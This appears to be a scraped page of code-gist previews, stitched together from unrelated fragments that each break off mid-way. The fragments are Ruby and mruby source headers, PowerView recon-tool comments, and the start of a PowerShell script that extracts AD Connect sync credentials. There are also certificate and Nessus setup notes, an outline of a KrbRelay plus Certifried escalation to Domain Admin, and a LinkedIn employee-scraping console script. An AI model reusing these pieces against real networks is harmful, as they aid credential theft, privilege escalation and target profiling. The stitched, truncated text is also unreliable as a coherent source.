| #undef RUBY_EXPORT | |
| #include "ruby.h" | |
| #include "vm_debug.h" | |
| #ifdef HAVE_LOCALE_H | |
| #include <locale.h> | |
| #endif | |
| #ifdef RUBY_DEBUG_ENV | |
| #include <stdlib.h> | |
| #endif |
| /********************************************************************** | |
| ruby.c - | |
| $Author: usa $ | |
| created at: Tue Aug 10 12:47:31 JST 1993 | |
| Copyright (C) 1993-2007 Yukihiro Matsumoto | |
| Copyright (C) 2000 Network Applied Communication Laboratory, Inc. | |
| Copyright (C) 2000 Information-technology Promotion Agency, Japan |
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <string.h> | |
| #include <mruby.h> | |
| #include <mruby/array.h> | |
| #include <mruby/compile.h> | |
| #include <mruby/dump.h> | |
| #include <mruby/variable.h> | |
| int main(int argc, char *argv[]) |
| # PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/ | |
| # tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c | |
| # the most up-to-date version of PowerView will always be in the dev branch of PowerSploit: | |
| # https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 | |
| # New function naming schema: | |
| # Verbs: | |
| # Get : retrieve full raw data sets | |
| # Find : ‘find’ specific data entries in a data set |
| Write-Host "AD Connect Sync Credential Extract v2 (@_xpn_)" | |
| Write-Host "`t[ Updated to support new cryptokey storage method ]`n" | |
| $client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=(localdb)\.\ADSync2019;Initial Catalog=ADSync" | |
| try { | |
| $client.Open() | |
| } catch { | |
| Write-Host "[!] Could not connect to localdb..." | |
| return |
Some golden links when you are having issues: https://social.technet.microsoft.com/Forums/windows/en-US/96016a13-9062-4842-b534-203d2f400cae/ca-certificate-request-error-quotdenied-by-policy-module-0x80094800quot-windows-server-2008?forum=winserversecurity
Download and install Certi
| sudo dpkg --add-architecture armhf | |
| sudo apt update | |
| sudo apt-get install libc6:armhf libncurses5:armhf libstdc++6:armhf | |
| sudo dpkg -i --force-architecture Nessus-10.x-raspberrypios_armhf.deb |
Short HOWTO about one use case of the work from Cube0x0 (KrbRelay) and others.
No-Fix Local Privilege Escalation from low-priviliged domain user to local system on domain-joined computers.
Prerequisites:
Certifried (CVE-2022-26923) gives Domain Admin from non-privileged user with the requirement adding computer accounts or owning a computer account. Kerberos Relay targeting LDAP and Shadow Credentials gives a non-privileged domain user on a domain-joined machine local admin access on (aka owning) the machine. Combination of these two: non-privileged domain user escalating to Domain Admin without the requirement adding/owning computer accounts.
The attack below uses only Windows (no Linux tools interacting with the Domain), simulating a real-world attack scenario.
Prerequisites:
| // 1. Access a company page on LinkedIn and click on the company employees | |
| // 2. Open the browser dev console | |
| // 3. Import jQuery first (copy and paste jQuery into browser dev console will do) | |
| // 4. Copy and paste the below in the console | |
| // 5. Wait until the last page (10 people per page are displayed) | |
| // 6. Enjoy the list in console output | |
| function scrape(){ | |
| jQuery.each(jQuery('span.entity-result__title-line span a span span[aria-hidden="true"]'), function(i,v){ | |
| console.log((v.innerHTML.replace(/<!---->/g, "").replace(/ /g, "."))); |
